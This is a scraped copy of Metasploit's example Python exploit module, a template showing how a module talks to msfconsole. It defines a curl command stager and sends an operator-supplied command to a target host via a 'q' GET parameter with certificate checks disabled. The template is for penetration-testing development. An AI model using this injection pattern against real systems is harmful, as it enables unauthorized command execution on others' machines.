Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/example.py
Views: 11766
#!/usr/bin/env python31# -*- coding: utf-8 -*-23# standard modules4import logging56# extra modules7dependencies_missing = False8try:9import requests10except ImportError:11dependencies_missing = True1213from metasploit import module141516metadata = {17'name': 'Python Module Example',18'description': '''19Python communication with msfconsole.20''',21'authors': [22'Jacob Robles'23],24'date': '2018-03-22',25'license': 'MSF_LICENSE',26'references': [27{'type': 'url', 'ref': 'https://www.rapid7.com/blog/post/2017/12/28/regifting-python-in-metasploit/'},28{'type': 'aka', 'ref': 'Coldstone'}29],30'type': 'remote_exploit_cmd_stager',31'targets': [32{'platform':'linux', 'arch': 'x86'}33],34'payload': {35'command_stager_flavor': 'curl',36},37'options': {38'targeturi': {'type': 'string', 'description': 'The base path', 'required': True, 'default': '/'},39'rhost': {'type': 'address', 'description': 'Target address', 'required': True, 'default': None},40'command': {'type': 'string', 'description': 'The command to execute via the q GET parameter', 'required': True}41}42}434445def run(args):46module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))47if dependencies_missing:48logging.error('Module dependency (requests) is missing, cannot continue')49return5051# Your code here52try:53# args['command'] is where the command stager command lives54r = requests.get('https://{}/{}/?q={}'.format(args['rhost'], args['targeturi'], args['command']), verify=False)55except requests.exceptions.RequestException as e:56logging.error('{}'.format(e))57return5859logging.info('{}...'.format(r.text[0:50]))606162if __name__ == '__main__':63module.run(metadata, run)646566